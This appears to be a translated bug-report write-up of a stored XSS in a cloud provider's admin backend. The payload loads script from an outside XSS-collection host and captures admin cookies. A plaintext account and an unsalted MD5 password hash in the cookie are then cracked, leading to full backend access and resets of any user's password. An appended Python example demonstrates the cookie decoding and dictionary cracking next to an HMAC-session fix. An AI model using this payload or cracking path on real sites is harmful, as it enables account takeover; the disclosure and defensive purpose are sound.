When XSS meets blind injection, when XSS meets an expired session, when the cookie gives it all away: get into the backend and reset any user's password. How many websites' images would all go down? How many websites would be dragged in?

Back at school again, with a lot on my mind. There are still more than 1000 days until the college entrance exam. I miss my friends and classmates and don't know how to live in the future. After the exam, will it be praise, or something to look back on with regret? Or maybe I'm overthinking it.

I'm still waiting on that any-user password modification vulnerability. Do the MaxCompute folks see this at the architects' meeting? As for the details, I already reported this XSS together with Alibaba Cloud; it seems the XSS has already been fixed and removed. (I'll take the score together with the vulnerabilities below ~)

The earlier test account has not been deleted, only disabled. It is still displayed in the backend, and so is the XSS code. Today I went through the XSS platform list and found a UPYUN address, so I went to play with its cookies and found that the user's account is stored in the cookie in plaintext and the password as a 32-character MD5 hash ..... So I got into the backend with the correct password and found that any user's password can be reset. What the consequences of a reset are ~~

Proof of vulnerability:

1. Register a free account and put the XSS payload in the personal information field: "><script src=http://xsser.me/pIQKKz></script>
2. Wait for an admin to view my information ~
3. Log in with the captured cookies and address spoofing. Depressing: the session was invalid.
4. While depressed, I looked at the cookies and noticed something odd. Decoding them with decodeURIComponent, I found a password field, a 32-character MD5 hash. So that cost a fee to crack. After a round of cracking I had the password, and it looked like a weak password...
5. After that I successfully got into the backend, with all of its functions. ======

Solution: Shouldn't the backend be closed off from the public internet? Fix the cookies? Which website have you ever seen store the password in the cookie? Don't use weak passwords in the company; change them to strong ones ~ And don't dock his salary, or he'll blame me.
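Added example, not code from the original report or from UPYUN: it walks the same path the report describes (URL-decode the cookie, spot the 32-hex MD5 field, run a dictionary attack on it) and then shows what the cookie should have carried instead, an opaque random session id bound with an HMAC so that nothing about the password leaks. The cookie string, the field names `user`/`pwd`, the wordlist and the secret are all constructed for the demonstration; the real cookie layout is not known from the report.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, Iterable, Optional, Tuple
from urllib.parse import quote, unquote

# Constructed sample cookie in the shape the report describes: the account in
# plaintext and the password as an unsalted 32-hex MD5 digest. The digest is
# md5("123456"). The field names are assumptions, not UPYUN's real ones.
SAMPLE_COOKIE = (
    "user=admin%40example.com; "
    "pwd=e10adc3949ba59abbe56e057f20f883e; "
    "path=%2F"
)

# Constructed mini wordlist standing in for a real cracking dictionary.
WEAK_PASSWORDS = ["password", "admin", "123456", "qwerty", "111111"]

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def parse_cookie(raw: str) -> Dict[str, str]:
    """Split a Cookie header into fields, URL-decoding each value
    (the same step as decodeURIComponent in the browser console)."""
    fields: Dict[str, str] = {}
    for part in raw.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, value = part.split("=", 1)
        fields[name.strip()] = unquote(value)
    return fields


def find_md5_fields(fields: Dict[str, str]) -> Dict[str, str]:
    """Return every cookie field whose value looks like an MD5 digest."""
    return {k: v.lower() for k, v in fields.items() if MD5_HEX.match(v.lower())}


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on an unsalted MD5: hash each candidate and compare."""
    digest = digest.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


def recover_credentials(raw_cookie: str, wordlist: Iterable[str]) -> Optional[Tuple[Optional[str], str]]:
    """The whole attack path from the report: decode the cookie, find the MD5
    field, crack it, and return (account, password) if the password is weak."""
    fields = parse_cookie(raw_cookie)
    for _name, digest in find_md5_fields(fields).items():
        password = crack_md5(digest, wordlist)
        if password is not None:
            return fields.get("user"), password
    return None


# What the cookie should carry instead: a random session id bound to the server
# with an HMAC, so it can be neither forged nor tampered with. The secret lives
# only on the server and the cookie reveals nothing about the password. (A
# server-side session store keyed by the id is still needed for revocation.)
def issue_session_cookie(user: str, secret: bytes) -> str:
    nonce = os.urandom(16).hex()
    payload = f"{user}.{nonce}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return quote(f"{payload}.{tag}", safe="")  # URL-encoded like a real cookie


def verify_session_cookie(cookie: str, secret: bytes) -> Optional[str]:
    """Return the user if the tag verifies, None on any tampering.
    rsplit keeps a user name that itself contains dots intact."""
    try:
        user, nonce, tag = unquote(cookie).rsplit(".", 2)
    except ValueError:
        return None
    expected = hmac.new(secret, f"{user}.{nonce}".encode(), hashlib.sha256).hexdigest()
    return user if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    print("attacker recovers:", recover_credentials(SAMPLE_COOKIE, WEAK_PASSWORDS))
    secret = os.urandom(32)
    good = issue_session_cookie("admin@example.com", secret)
    print("hardened cookie verifies as:", verify_session_cookie(good, secret))
    print("hardened cookie with wrong key:", verify_session_cookie(good, b"other"))
```

Two things the example makes concrete: an unsalted MD5 in a cookie is cracked offline at the attacker's leisure with no rate limit, so a weak password falls to a small wordlist, and an HMAC-bound random session id gives the attacker nothing to crack even if the cookie is stolen via XSS (mark it HttpOnly as well so the script cannot read it in the first place).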